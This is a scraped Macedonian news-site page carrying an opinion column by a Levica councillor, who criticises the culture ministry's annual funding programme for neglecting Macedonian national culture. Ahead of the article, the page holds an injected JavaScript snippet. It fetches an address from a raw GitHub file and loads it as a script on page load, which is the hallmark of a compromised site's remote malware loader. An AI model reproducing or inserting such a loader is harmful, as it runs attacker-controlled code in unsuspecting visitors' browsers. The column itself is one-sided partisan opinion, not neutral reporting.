;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Култура во скафандер - Антропол
АктуелноЛокално

Култура во скафандер

Пишува: Игор Смилев, еко-активист и Советник од Левица во Општина Велес.

Резултатите од Годишната програма за остварување на јавен интерес во културата, уште еднаш ни го покажаа културниот траор што веќе пет години ја пустоши Македонија. Не дека очекувавме нешто поразлично, но да бидеме искрени, потајно се надевавме. Да се случи нешто, да се направи некаков исчекор, да се подигне летвичката, да се доведеме во памет, да покажеме минимум грижа за она без што едноставно не нема – културата.

Петтата министерка (на СДСМ) по ред, само ја покажа сеопфатната безидејност на естаблишментот кој за жал сè уште раководи со (она што остана од) земјава. Задоволени апетити на алчните и корумпирани невладини кои всушност во моментов се раководители на културните случувања во Македонија, тотална незаинтересираност за националниот наратив, македонската култура едноставно не постои во Годишната програма за остварување на јавен интерес во културата.

Ниту еден денар издвоени средства за 150 годишнината од раѓањето на апостолот на македонското револуционерно дело Гоце Делчев, казнети национални установи со повеќе од симболични износи за работа во 2022, страв од ископување на до скоро богатите археолошки локалитети, за евентуално да не биде пронајден артефакт кој потсетува на сеприсутноста на македонската антика во Македонија, заборавена македонска архитектура, потполна негрижа за архитектурата на старите градски јадра, на сметка на баснословни суми за прослава на независноста на Косово на пример.

Петтата министерка во скафандер, на најдобар начин ја продолжува традицијата на неспособност, епохално незнаење, нестручност и дезориентираност на македонската култура денес.

Низ излитената флоскула за спроведување на некоја си граѓанска културна политика, компатибилна со едно општество за сите, живееме тежок период во кој Македонија денес издвојува средства за секакви културни проблесоци, освен за македонската култура. Оттаму нека не не’ зачудува фактот што нашите винари на клоци се избркани од еден фестивал на виното во Франција, кога само и помислиле своето вино да го декларираат како вино од Македонија. Колку и рамото на Таче и изгубениот Маричиќ да не убедуваат во идентитетскиот бетон на македонскиот идентитет и особеност, сеприсутните урнатини на македонската култура неповратно исчезнуваат пред очите на Македонците.

Културата на „нашата земја”, некогаш најсилното и најсветлото оружје на македонскиот идентитет, продолжува да темнее во безидејниот казамат на сдсмовштината, од која одамна е ампутирано било какво чувство на припадност и чија идентитетска казна заеднички ќе ја плаќаме долги години на ред.